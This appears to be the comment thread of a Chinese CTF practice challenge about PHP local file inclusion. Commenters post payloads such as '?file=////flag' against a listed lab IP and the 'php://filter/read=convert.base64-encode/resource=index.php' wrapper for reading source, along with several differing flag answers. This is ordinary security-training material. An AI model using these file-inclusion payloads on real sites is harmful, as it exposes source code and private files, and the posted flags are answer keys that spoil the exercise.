http://114.67.175.224:18171/index.php?file=////flag
使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。
flag{782073eb4dee97623a2e558efe3eec5a}
flag{08d4833b-b9e1-473d-8621-58a358e9014a}
/index.php?file=/flag
php伪协议读取index.php
我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php
flag{642c1d8cf84d01e3a2df403e83d3e43b}
/index.php?file=///flag
?file=php://filter/read=convert.base64-encode/resource=index.php
flag{dff1aea3fcdd906ce70c1998addf1ccc}
...
评论
00zz 13天前
举报
http://114.67.175.224:18171/index.php?file=////flag
TYing 18天前
举报
使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。
自由魂儿儿儿 1月前
举报
flag{782073eb4dee97623a2e558efe3eec5a}
622独爱辉神 1月前
举报
flag{08d4833b-b9e1-473d-8621-58a358e9014a}
000ooo 1月前
举报
/index.php?file=/flag
Zhumeng 1月前
举报
php伪协议读取index.php
Jiafeng 1月前
举报
我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php
Wang_Micro 2月前
举报
flag{642c1d8cf84d01e3a2df403e83d3e43b}
33555 2月前
举报
/index.php?file=///flag
Pearpeach1 2月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
hao7 3月前
举报
flag{dff1aea3fcdd906ce70c1998addf1ccc}